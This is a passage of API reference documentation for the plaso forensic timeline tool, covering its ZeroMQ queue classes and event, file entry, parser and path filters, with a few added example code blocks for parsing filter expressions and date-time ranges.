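    """Returns None when the file parses, else the error message."""
    try:
        parse_filter_file(text, environment)
    except (ValueError, KeyError) as error:
        return str(error)
    return None


def load_sample_filters():
    return parse_filter_file(SAMPLE_FILTER_FILE, {'SystemRoot': 'C:\\Windows'})
```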
plaso.engine.zeromq_queue module
ZeroMQ implementations of the Plaso queue interface.
class plaso.engine.zeromq_queue.ZeroMQBufferedQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQQueue
Parent class for buffered Plaso queues.
Buffered queues use a regular Python queue to store items that are pushed or popped from the queue without blocking on underlying ZeroMQ operations.
This class should not be instantiated directly, a subclass should be instantiated instead.
Close(abort=False)
Closes the queue.
Parameters abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost.
Raises
• QueueAlreadyClosed – if the queue is not started, or has already been closed.
• RuntimeError – if closed or terminate event is missing.
Empty()
Removes all items from the internal buffer.
class plaso.engine.zeromq_queue.ZeroMQBufferedReplyBindQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue
A Plaso queue backed by a ZeroMQ REP socket that binds to a port.
This queue may only be used to pop items, not to push.
SOCKET_CONNECTION_TYPE = 1
class plaso.engine.zeromq_queue.ZeroMQBufferedReplyQueue(buffer_timeout_seconds=2, buffer_max_size=10000, delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQBufferedQueue
Parent class for buffered Plaso queues backed by ZeroMQ REP sockets.
This class should not be instantiated directly, a subclass should be instantiated instead.
Instances of this class or subclasses may only be used to push items, not to pop.
PopItem()
Pops an item off the queue.
Provided for compatibility with the API, but doesn’t actually work.
Raises WrongQueueType – as Pop is not supported by this queue.
PushItem(item, block=True)
Pushes an item on to the queue.
If no ZeroMQ socket has been created, one will be created the first time this method is called.
Parameters
• item (object) – item to push on the queue.
• block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode.
Raises
• QueueAlreadyClosed – if the queue is closed.
• QueueFull – if the internal buffer was full and it was not possible to push the item to the buffer within the timeout.
• RuntimeError – if closed event is missing.
class plaso.engine.zeromq_queue.ZeroMQPullConnectQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQPullQueue
A Plaso queue backed by a ZeroMQ PULL socket that connects to a port.
This queue may only be used to pop items, not to push.
SOCKET_CONNECTION_TYPE = 2
class plaso.engine.zeromq_queue.ZeroMQPullQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQQueue
Parent class for Plaso queues backed by ZeroMQ PULL sockets.
This class should not be instantiated directly, a subclass should be instantiated instead.
Instances of this class or subclasses may only be used to pop items, not to push.
PopItem()
Pops an item off the queue.
If no ZeroMQ socket has been created, one will be created the first time this method is called.
Returns item from the queue.
Return type object
Raises
• KeyboardInterrupt – if the process is sent a KeyboardInterrupt while popping an item.
• QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout.
• RuntimeError – if closed or terminate event is missing.
• zmq.error.ZMQError – if a ZeroMQ error occurs.
PushItem(item, block=True)
Pushes an item on to the queue.
Provided for compatibility with the API, but doesn’t actually work.
Parameters
• item (object) – item to push on the queue.
• block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode.
Raises WrongQueueType – as Push is not supported by this queue.
class plaso.engine.zeromq_queue.ZeroMQPushBindQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQPushQueue
A Plaso queue backed by a ZeroMQ PUSH socket that binds to a port.
This queue may only be used to push items, not to pop.
SOCKET_CONNECTION_TYPE = 1
class plaso.engine.zeromq_queue.ZeroMQPushQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQQueue
Parent class for Plaso queues backed by ZeroMQ PUSH sockets.
This class should not be instantiated directly, a subclass should be instantiated instead.
Instances of this class or subclasses may only be used to push items, not to pop.
PopItem()
Pops an item off the queue.
Provided for compatibility with the API, but doesn’t actually work.
Raises WrongQueueType – as Pop is not supported by this queue.
PushItem(item, block=True)
Pushes an item on to the queue.
If no ZeroMQ socket has been created, one will be created the first time this method is called.
Parameters
• item (object) – item to push on the queue.
• block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode.
Raises
• KeyboardInterrupt – if the process is sent a KeyboardInterrupt while pushing an item.
• QueueFull – if it was not possible to push the item to the queue within the timeout.
• RuntimeError – if terminate event is missing.
• zmq.error.ZMQError – if a ZeroMQ specific error occurs.
class plaso.engine.zeromq_queue.ZeroMQQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.plaso_queue.Queue
Interface for a ZeroMQ backed queue.
name
name to identify the queue.
Type str
port
TCP port that the queue is connected or bound to. If the queue is not yet bound or connected to a port, this value will be None.
Type int
timeout_seconds
number of seconds that calls to PopItem and PushItem may block for, before returning queue.QueueEmpty.
Type int
Close(abort=False)
Closes the queue.
Parameters abort (Optional[bool]) – whether the Close is the result of an abort condition. If True, queue contents may be lost.
Raises
• QueueAlreadyClosed – if the queue is not started, or has already been closed.
• RuntimeError – if closed or terminate event is missing.
IsBound()
Checks if the queue is bound to a port.
IsConnected()
Checks if the queue is connected to a port.
IsEmpty()
Checks if the queue is empty.
ZeroMQ queues don’t have a concept of “empty”: there could always be messages on the queue that a producer or consumer is unaware of. Thus, the queue is never empty, so we return False. Note that it is possible that a queue is unable to pop an item from a queue within a timeout, which will cause PopItem to raise a QueueEmpty exception, but this is a different condition.
Returns False, to indicate that the queue isn’t empty.
Return type bool
Open()
Opens this queue, causing the creation of a ZeroMQ socket.
Raises QueueAlreadyStarted – if the queue is already started, and a socket already exists.
abstract PopItem()
Pops an item off the queue.
Returns item from the queue.
Return type object
Raises QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout.
abstract PushItem(item, block=True)
Pushes an item on to the queue.
Parameters
• item (object) – item to push on the queue.
• block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode.
Raises QueueAlreadyClosed – if the queue is closed.
SOCKET_CONNECTION_BIND = 1
SOCKET_CONNECTION_CONNECT = 2
SOCKET_CONNECTION_TYPE = None
class plaso.engine.zeromq_queue.ZeroMQRequestConnectQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQRequestQueue
A Plaso queue backed by a ZeroMQ REQ socket that connects to a port.
This queue may only be used to pop items, not to push.
SOCKET_CONNECTION_TYPE = 2
class plaso.engine.zeromq_queue.ZeroMQRequestQueue(delay_open=True, linger_seconds=10, maximum_items=1000, name='Unnamed', port=None, timeout_seconds=5)
Bases: plaso.engine.zeromq_queue.ZeroMQQueue
Parent class for Plaso queues backed by ZeroMQ REQ sockets.
This class should not be instantiated directly, a subclass should be instantiated instead.
Instances of this class or subclasses may only be used to pop items, not to push.
PopItem()
Pops an item off the queue.
If no ZeroMQ socket has been created, one will be created the first time this method is called.
Returns item from the queue.
Return type object
Raises
• KeyboardInterrupt – if the process is sent a KeyboardInterrupt while popping an item.
• QueueEmpty – if the queue is empty, and no item could be popped within the queue timeout.
• RuntimeError – if terminate event is missing.
• zmq.error.ZMQError – if an error occurs in ZeroMQ.
PushItem(item, block=True)
Pushes an item on to the queue.
Provided for compatibility with the API, but doesn’t actually work.
Parameters
• item (object) – item to push on the queue.
• block (Optional[bool]) – whether the push should be performed in blocking or non-blocking mode.
Raises WrongQueueType – as Push is not supported by this queue.
Module contents
5.1.6 plaso.filters package
Submodules
plaso.filters.event_filter module
The event filter.
class plaso.filters.event_filter.EventObjectFilter
Bases: plaso.filters.interface.FilterObject
Event filter.
CompileFilter(filter_expression)
Compiles the filter expression.
The filter expression contains an object filter expression.
Parameters filter_expression (str) – filter expression.
Raises ParseError – if the filter expression cannot be parsed.
Match(event, event_data, event_data_stream, event_tag)
Determines if an event matches the filter.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns True if the event matches the filter, False otherwise.
Return type bool
plaso.filters.expression_parser module
Event filter expression parser.
class plaso.filters.expression_parser.EventFilterExpressionParser
Bases: object
Event filter expression parser.
Examples of valid syntax:
size is 40
(name contains “Program Files” AND hash.md5 is “123abc”)
@imported_modules (num_symbols = 14 AND symbol.name is “FindWindow”)
HexEscape(string, match, **unused_kwargs)
Converts a hex escaped string.
Note that this function is used as a callback by _GetNextToken.
Returns next state, which is None.
Return type str
Raises ParseError – if the string is not hex escaped.
InsertArg(string='', **unused_kwargs)
Inserts an argument into the current expression.
Parameters string (Optional[str]) – argument string.
Returns state or None if the argument could not be added to the current expression.
Return type str
Raises ParseError – if the operator does not support negation.
InsertFloatArg(string='', **unused_kwargs)
Inserts a floating-point argument into the current expression.
Parameters string (Optional[str]) – argument string that contains a floating-point value.
Returns state or None if the argument could not be added to the current expression.
Return type str
Raises ParseError – TBD.
InsertInt16Arg(string='', **unused_kwargs)
Inserts a hexadecimal integer argument into the current expression.
Parameters string (Optional[str]) – argument string that contains an integer value formatted in hexadecimal.
Returns state or None if the argument could not be added to the current expression.
Return type str
Raises ParseError – if string does not contain a valid base16 formatted integer.
InsertIntArg(string='', **unused_kwargs)
Inserts a decimal integer argument into the current expression.
Parameters string (Optional[str]) – argument string that contains an integer value formatted in decimal.
Returns state or None if the argument could not be added to the current expression.
Return type str
Raises ParseError – if string does not contain a valid integer.
Parse(expression)
Parses an event filter expression.
Parameters expression (str) – event filter expression.
Returns expression.
Return type Expression
class plaso.filters.expression_parser.Token(state, regex, actions, next_state)
Bases: object
An event filter expression parser token.
actions
list of method names in the EventFilterExpressionParser to call.
Type list[str]
next_state
next state we transition to if this Token matches.
Type str
state
parser state within which the token should be applied, or None if the token should be applied regardless of the parser state.
Type str
CompareExpression(expression)
Compares the token against an expression string.
Parameters expression (str) – expression string.
Returns the regular expression match object if the expression string matches the token or None if no match.
Return type re.Match
plaso.filters.expressions module
The event filter expression parser expression classes.
class plaso.filters.expressions.BinaryExpression(operator='')
Bases: plaso.filters.expressions.Expression
An event filter parser expression which takes two other expressions.
AddOperands(lhs, rhs)
Adds an operand.
Parameters
• lhs (Expression) – left hand side expression.
• rhs (Expression) – right hand side expression.
Raises ParseError – if either left hand side or right hand side expression is not an instance of Expression.
Compile()
Compiles the expression into a filter.
Returns filter object corresponding to the expression.
Return type Filter
Raises ParseError – if the operator is not supported.
__repr__()
Retrieves a string representation of the object for debugging.
class plaso.filters.expressions.EventExpression
Bases: plaso.filters.expressions.Expression
Event expression.
Compile()
Compiles the expression into a filter.
Returns filter object corresponding to the expression.
Return type Filter
Raises ParseError – if the operator is missing or unknown.
Negate()
Reverses the logic of (negates) the expression.
__repr__()
Retrieves a string representation of the object for debugging.
class plaso.filters.expressions.Expression
Bases: object
An event filter parser expression.
attribute
attribute or None if not set.
Type str
args
arguments.
Type list[str]
number_of_args
expected number of arguments.
Type int
operator
operator or None if not set.
Type str
AddArg(argument)
Adds a new argument to this expression.
Parameters argument (str) – argument to add.
Returns True if the argument is the last argument, False otherwise.
Return type bool
Raises ParseError – if there are too many arguments.
abstract Compile()
Compiles the expression into a filter.
Returns filter object corresponding to the expression.
Return type Filter
SetAttribute(attribute)
Sets the attribute.
Parameters attribute (str) – attribute, or None if not set.
SetOperator(operator)
Sets the operator.
Parameters operator (str) – operator, such as “and” or “&&”, or None if not set.
attribute = None
class plaso.filters.expressions.IdentityExpression
Bases: plaso.filters.expressions.Expression
An event filter parser expression which always evaluates to True.
Compile()
Compiles the expression into a filter.
Returns filter object which always evaluates to True.
Return type IdentityFilter
plaso.filters.file_entry module
File entry filters.
class plaso.filters.file_entry.DateTimeFileEntryFilter
Bases: plaso.filters.file_entry.FileEntryFilter
Date and time-based file entry filter.
AddDateTimeRange(time_value, start_time_string=None, end_time_string=None)
Adds a date time filter range.
The time strings are formatted as: YYYY-MM-DD hh:mm:ss.######[+-]##:##
Where # are numeric digits ranging from 0 to 9 and the seconds fraction can be either 3 or 6 digits. The time of day, seconds fraction and timezone offset are optional. The default timezone is UTC.
Parameters
• time_value (str) – time value, such as atime, ctime, crtime, dtime, bkup and mtime.
• start_time_string (str) – start date and time value string.
• end_time_string (str) – end date and time value string.
Raises ValueError – if the filter is badly formed.
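The time string format, its optional parts and the "badly formed" checks described above, as an added example that is not plaso's own code. It assumes that a timezone offset is only written after a time of day, that a file entry can be represented by a dict of time value names to aware datetimes (standing in for dfvfs.FileEntry), and that every applicable range must hold for a match.

```python
import re
from datetime import datetime, timedelta, timezone

# Accepts YYYY-MM-DD hh:mm:ss.######[+-]##:## with the time of day, the
# 3- or 6-digit seconds fraction and the offset optional. Requiring a time of
# day before an offset is an assumption of this example.
TIME_STRING = re.compile(
    r'^(?P<date>\d{4}-\d{2}-\d{2})'
    r'(?: (?P<time>\d{2}:\d{2}:\d{2})(?:\.(?P<fraction>\d{3}|\d{6}))?'
    r'(?:(?P<sign>[+-])(?P<offset>\d{2}:\d{2}))?)?$')


def parse_time_string(time_string):
    """Parses a filter time string into an aware datetime normalized to UTC.
    Raises ValueError for anything that is not well formed."""
    match = TIME_STRING.match(time_string)
    if not match:
        raise ValueError(f'unsupported time string: {time_string!r}')
    value = datetime.strptime(match.group('date'), '%Y-%m-%d')
    if match.group('time'):
        hours, minutes, seconds = (int(p) for p in match.group('time').split(':'))
        # A 3-digit fraction is milliseconds; pad it to microseconds.
        fraction = (match.group('fraction') or '').ljust(6, '0')
        # replace() validates the ranges, e.g. hour 25 raises ValueError.
        value = value.replace(hour=hours, minute=minutes, second=seconds,
                              microsecond=int(fraction))
    offset = timedelta(0)  # default timezone is UTC
    if match.group('sign'):
        offset_hours, offset_minutes = (int(p) for p in match.group('offset').split(':'))
        offset = timedelta(hours=offset_hours, minutes=offset_minutes)
        if match.group('sign') == '-':
            offset = -offset
    return value.replace(tzinfo=timezone(offset)).astimezone(timezone.utc)


def is_well_formed(time_string):
    try:
        parse_time_string(time_string)
    except ValueError:
        return False
    return True


class DateTimeRangeFilter:
    """Constructed stand-in for the date and time-based file entry filter
    described above; a file entry is a dict of time value names to aware
    datetimes (an assumption replacing dfvfs.FileEntry)."""
    TIME_VALUES = ('atime', 'bkup', 'crtime', 'ctime', 'dtime', 'mtime')

    def __init__(self):
        self._ranges = []

    def add_date_time_range(self, time_value, start_time_string=None,
                            end_time_string=None):
        """Adds a range; raises ValueError if the range is badly formed."""
        if time_value not in self.TIME_VALUES:
            raise ValueError(f'unsupported time value: {time_value!r}')
        if start_time_string is None and end_time_string is None:
            raise ValueError('a range needs a start time, an end time or both')
        start = parse_time_string(start_time_string) if start_time_string else None
        end = parse_time_string(end_time_string) if end_time_string else None
        if start and end and start > end:
            raise ValueError('start time is after end time')
        self._ranges.append((time_value, start, end))

    def matches(self, file_entry):
        """True if every range whose time value the entry carries contains that
        timestamp, False if one does not, None if no range applies."""
        applicable = False
        for time_value, start, end in self._ranges:
            timestamp = file_entry.get(time_value)
            if timestamp is None:
                continue
            applicable = True
            if (start and timestamp < start) or (end and timestamp > end):
                return False
        return True if applicable else None


def build_sample_filter():
    """Constructed filter: files modified during October 2020 (UTC)."""
    date_time_filter = DateTimeRangeFilter()
    date_time_filter.add_date_time_range(
        'mtime', '2020-10-01', '2020-10-31 23:59:59.999999')
    return date_time_filter


def range_error(time_value, start_time_string=None, end_time_string=None):
    """Returns the ValueError message for a badly formed range, else None."""
    try:
        DateTimeRangeFilter().add_date_time_range(
            time_value, start_time_string, end_time_string)
    except ValueError as error:
        return str(error)
    return None
```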
Matches(file_entry)
Compares the file entry against the filter.
Parameters file_entry (dfvfs.FileEntry) – file entry to compare.
Returns True if the file entry matches the filter, False if not or None if the filter does not apply.
Return type bool
Print(output_writer)
Prints a human readable version of the filter.
Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.ExtensionsFileEntryFilter(extensions)
Bases: plaso.filters.file_entry.FileEntryFilter
Extensions-based file entry filter.
Matches(file_entry)
Compares the file entry against the filter.
Parameters file_entry (dfvfs.FileEntry) – file entry to compare.
Returns True if the file entry matches the filter, False if not or None if the filter does not apply.
Return type bool
Print(output_writer)
Prints a human readable version of the filter.
Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.FileEntryFilter
Bases: object
File entry filter interface.
abstract Matches(file_entry)
Compares the file entry against the filter.
Parameters file_entry (dfvfs.FileEntry) – file entry to compare.
Returns True if the file entry matches the filter, False if not or None if the filter does not apply.
Return type bool
abstract Print(output_writer)
Prints a human readable version of the filter.
Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.FileEntryFilterCollection
Bases: object
Collection of file entry filters.
AddFilter(file_entry_filter)
Adds a file entry filter to the collection.
Parameters file_entry_filter (FileEntryFilter) – file entry filter.
HasFilters()
Determines if filters are defined.
Returns True if filters are defined.
Return type bool
Matches(file_entry)
Compares the file entry against the filter collection.
Parameters file_entry (dfvfs.FileEntry) – file entry to compare.
Returns True if the file entry matches one of the filters. If no filters are provided or applicable the result will be True.
Return type bool
Print(output_writer)
Prints a human readable version of the filter.
Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.NamesFileEntryFilter(names)
Bases: plaso.filters.file_entry.FileEntryFilter
Names-based file entry filter.
Matches(file_entry)
Compares the file entry against the filter.
Parameters file_entry (dfvfs.FileEntry) – file entry to compare.
Returns True if the file entry matches the filter.
Return type bool
Print(output_writer)
Prints a human readable version of the filter.
Parameters output_writer (CLIOutputWriter) – output writer.
class plaso.filters.file_entry.SignaturesFileEntryFilter(specification_store, signature_identifiers)
Bases: plaso.filters.file_entry.FileEntryFilter
Signature-based file entry filter.
Matches(file_entry)
Compares the file entry against the filter.
Parameters file_entry (dfvfs.FileEntry) – file entry to compare.
Returns True if the file entry matches the filter, False if not or None if the filter does not apply.
Return type bool
Print(output_writer)
Prints a human readable version of the filter.
Parameters output_writer (CLIOutputWriter) – output writer.
plaso.filters.filters module
The event filter expression parser filter classes.
class plaso.filters.filters.AndFilter(arguments=None)
Bases: plaso.filters.filters.Filter
A filter that performs a boolean AND on the arguments.
Note that if no conditions are passed, all objects will pass.
Matches(event, event_data, event_data_stream, event_tag)
Determines if the event, data and tag match the filter.
Parameters
• event (EventObject) – event to compare against the filter.
• event_data (EventData) – event data to compare against the filter.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag to compare against the filter.
Returns True if the event, data and tag match the filter, False otherwise.
Return type bool
class plaso.filters.filters.BinaryOperator(arguments=None, **kwargs)
Bases: plaso.filters.filters.Operator
Interface for binary operators.
left_operand
left hand operand.
Type object
right_operand
right hand operand.
Type object
abstract Matches(event, event_data, event_data_stream, event_tag)
Determines if the event, data and tag match the filter.
Parameters
• event (EventObject) – event to compare against the filter.
• event_data (EventData) – event data to compare against the filter.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag to compare against the filter.
Returns True if the event, data and tag match the filter, False otherwise.
Return type bool
class plaso.filters.filters.Contains(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Operator to determine if a value contains another value.
class plaso.filters.filters.EqualsOperator(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Equals (==) operator.
class plaso.filters.filters.Filter(arguments=None)
Bases: object
Filter interface.
args arguments provided to the filter.
Type list[object]
abstract Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter.
Parameters
• event (EventObject) – event to compare against the filter.
• event_data (EventData) – event data to compare against the filter.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag to compare against the filter.
Returns True if the event, data and tag match the filter, False otherwise.
Return type bool
class plaso.filters.filters.GenericBinaryOperator(arguments=None, **kwargs)
Bases: plaso.filters.filters.BinaryOperator
Shared functionality for common binary operators.
FlipBool() Negates the internal boolean value attribute.
Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter.
Parameters
• event (EventObject) – event to compare against the filter.
• event_data (EventData) – event data to compare against the filter.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag to compare against the filter.
Returns True if the event, data and tag match the filter, False otherwise.
Return type bool
class plaso.filters.filters.GreaterEqualOperator(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Greater than or equals (>=) operator.
class plaso.filters.filters.GreaterThanOperator(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Greater than (>) operator.
class plaso.filters.filters.IdentityFilter(arguments=None)
Bases: plaso.filters.filters.Operator
A filter which always evaluates to True.
Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter.
Parameters
• event (EventObject) – event to compare against the filter.
• event_data (EventData) – event data to compare against the filter.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag to compare against the filter.
Returns True if the event, data and tag match the filter, False otherwise.
Return type bool
class plaso.filters.filters.InSet(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Operator to determine if a value is part of another value.
class plaso.filters.filters.LessEqualOperator(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Less than or equals (<=) operator.
class plaso.filters.filters.LessThanOperator(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Less than (<) operator.
class plaso.filters.filters.NotEqualsOperator(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Not equals (!=) operator.
class plaso.filters.filters.Operator(arguments=None)
Bases: plaso.filters.filters.Filter
Interface for filters that represent operators.
abstract Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter.
Parameters
• event (EventObject) – event to compare against the filter.
• event_data (EventData) – event data to compare against the filter.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag to compare against the filter.
Returns True if the event, data and tag match the filter, False otherwise.
Return type bool
class plaso.filters.filters.OrFilter(arguments=None)
Bases: plaso.filters.filters.Filter
A filter that performs a boolean OR on the arguments.
Note that if no conditions are passed, all objects will pass.
Matches(event, event_data, event_data_stream, event_tag) Determines if the event, data and tag match the filter.
Parameters
• event (EventObject) – event to compare against the filter.
• event_data (EventData) – event data to compare against the filter.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag to compare against the filter.
Returns True if the event, data and tag match the filter, False otherwise.
Return type bool
class plaso.filters.filters.Regexp(arguments=None, **kwargs)
Bases: plaso.filters.filters.GenericBinaryOperator
Operator to determine if a value matches a regular expression.
compiled_re compiled regular expression.
Type ???
class plaso.filters.filters.RegexpInsensitive(arguments=None, **kwargs)
Bases: plaso.filters.filters.Regexp
Operator to determine if a value matches a regular expression.
plaso.filters.interface module
Filter interface.
class plaso.filters.interface.FilterObject
Bases: object
Filter object interface.
abstract CompileFilter(filter_expression) Compiles the filter expression.
Parameters filter_expression (str) – filter expression.
Raises WrongPlugin – if the filter could not be compiled.
Match(event, event_data, event_data_stream, event_tag) Determines if an event matches the filter.
Parameters
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
• event_tag (EventTag) – event tag.
Returns True if the event matches the filter.
Return type bool
property fields name of the fields.
Type list[str]
property filter_expression compiled filter expression or None.
Type object
property filter_name name of the filter.
Type str
property limit row limit.
Type int
property separator output field separator.
Type str
plaso.filters.parser_filter module
Helper for parser and plugin filter expressions.
class plaso.filters.parser_filter.ParserFilterExpressionHelper
Bases: object
Helper for parser and plugin filter expressions.
A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. Each element can contain either:
• The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets).
• The name of a parser (case insensitive), for example ‘msiecf’.
• The name of a plugin, prefixed with the parser name and a ‘/’, for example ‘sqlite/chrome_history’.
If the element begins with an exclamation mark (‘!’) the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included.
ExpandPresets(presets_manager, expression) Expands all presets in a parser filter expression.
Parameters
• presets_manager (ParserPresetsManager) – a parser preset manager, that is used to resolve which parsers and/or plugins are defined by presets.
• expression (str) – parser filter expression, where None represents all parsers and plugins.
A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. Each element can be either:
– The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets).
– The name of a parser (case insensitive), for example ‘msiecf’.
– The name of a plugin, prefixed with the parser name and a ‘/’, for example ‘sqlite/chrome_history’.
If the element begins with an exclamation mark (‘!’) the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included.
Returns
a parser filter expression where presets have been expanded or None to represent all parsers and plugins.
Return type str
SplitExpression(expression) Determines the excluded and included elements in an expression string.
This method will not expand presets, and preset names are treated like parser names.
Parameters expression (str) – parser filter expression, where None represents all parsers and plugins.
A parser filter expression is a comma separated value string that denotes which parsers and plugins should be used. Each element can be either:
• The name of a preset (case sensitive), which is a predefined list of parsers and/or plugins (see data/presets.yaml for the default presets).
• The name of a parser (case insensitive), for example ‘msiecf’.
• The name of a plugin, prefixed with the parser name and a ‘/’, for example ‘sqlite/chrome_history’.
If the element begins with an exclamation mark (‘!’) the item will be excluded from the set of enabled parsers and plugins, otherwise the element will be included.
Returns
contains:
excludes (dict[str, set[str]]): excluded presets, parsers and plugins. Dictionary keys are preset and/or parser names, and values are sets containing plugin names to enable for a parser or an asterisk character (‘*’) to represent all plugins, or that no specific plugins were specified.
includes (dict[str, set[str]]): included presets, parsers and plugins. Dictionary keys are preset and/or parser names, and values are sets containing plugin names to enable for a parser or an asterisk character (‘*’) to represent all plugins, or that no specific plugins were specified.
Return type tuple
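The splitting described for SplitExpression, as an added example that is not plaso's own code: it reimplements the documented element grammar (comma separated, optional ‘!’ prefix, optional ‘parser/plugin’ form, ‘*’ for "no specific plugin") without expanding presets. The is_enabled resolution rule (an exclusion wins over an inclusion; no includes means everything is included) and the preset and plugin names in the sample are assumptions, not from the page.

```python
def split_parser_filter_expression(expression):
    """Splits a parser filter expression into excluded and included elements.

    Presets are not expanded, so a preset name is treated like a parser name.

    Args:
      expression (str): comma separated parser filter expression, where None
          or an empty string represents all parsers and plugins.

    Returns:
      tuple[dict[str, set[str]], dict[str, set[str]]]: excludes and includes.
          Keys are preset or parser names; values are the plugin names given
          for that parser, or {'*'} when no specific plugin was given.

    Raises:
      ValueError: if an element is malformed, for example a bare '!' or an
          empty plugin name after the '/'.
    """
    excludes = {}
    includes = {}
    if not expression:
        return excludes, includes

    for element in expression.split(','):
        element = element.strip()
        if not element:
            continue  # tolerate 'a,,b' and trailing commas

        target = includes
        if element.startswith('!'):
            target = excludes
            element = element[1:]

        parser_name, separator, plugin_name = element.partition('/')
        if not parser_name or (separator and not plugin_name):
            raise ValueError(
                'malformed parser filter element: {0:s}'.format(element))
        if not separator:
            plugin_name = '*'  # no specific plugin: all plugins of the parser

        target.setdefault(parser_name, set()).add(plugin_name)

    return excludes, includes


def is_enabled(parser_name, plugin_name, excludes, includes):
    """Resolves whether a parser (plugin) is enabled.

    Assumed resolution rule: an exclusion always wins over an inclusion, and
    an empty includes dictionary means every parser and plugin is included.
    plugin_name may be None for parsers without plugins.
    """
    excluded = excludes.get(parser_name, set())
    if '*' in excluded or plugin_name in excluded:
        return False
    if not includes:
        return True
    included = includes.get(parser_name, set())
    return '*' in included or plugin_name in included


if __name__ == '__main__':
    # Constructed sample; 'my_preset' and 'unwanted_plugin' are placeholders.
    sample = 'my_preset,msiecf,sqlite/chrome_history,!sqlite/unwanted_plugin'
    excludes, includes = split_parser_filter_expression(sample)
    print('excludes:', excludes)
    print('includes:', includes)
    for parser, plugin in [('sqlite', 'chrome_history'),
                           ('sqlite', 'unwanted_plugin'), ('msiecf', None)]:
        print(parser, plugin, is_enabled(parser, plugin, excludes, includes))
```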
plaso.filters.path_filter module
A scan tree-based path filter implementation.
The scan tree is a tree based on multiple paths that contains the path segments per node. The most significant path segment is at the root and therefore compared first. More information can be found here: https://github.com/libyal/libsigscan/wiki/Internals#scanning-tree-based-signature-scanning
The scan tree is used in the filter to filter provided paths.
class plaso.filters.path_filter.PathFilterScanTree(paths, case_sensitive=True, path_segment_separator='/')
Bases: object
Path filter scan tree.
CheckPath(path, path_segment_separator=None) Checks if a path matches the scan tree-based path filter.
Parameters
• path (str) – path.
• path_segment_separator (Optional[str]) – path segment separator, where None defaults to the path segment separator that was set when the path filter scan tree was initialized.
Returns True if the path matches the filter, False otherwise.
Return type bool
class plaso.filters.path_filter.PathFilterScanTreeNode(path_segment_index)
Bases: object
Class that implements a path filter scan tree node.
The path filter scan tree node defines the path segments for a specific path segment index to filter. Each path segment will point to a scan object that indicates the next part of the path filter. A default value indicates the scan object to use next when there was no match.
default_value the default scan object, which is either a scan tree sub node or a path.
Type str|PathFilterScanTreeNode
parent the parent path filter scan tree node or None if the node has no parent.
Type PathFilterScanTreeNode
path_segment_index path segment index represented by the node.
Type int
AddPathSegment(path_segment, scan_object) Adds a path segment.
Parameters
• path_segment (str) – path segment.
• scan_object (str|PathFilterScanTreeNode) – a scan object, which is either a scan tree sub node or a path.
Raises ValueError – if the node already contains a scan object for the path segment.
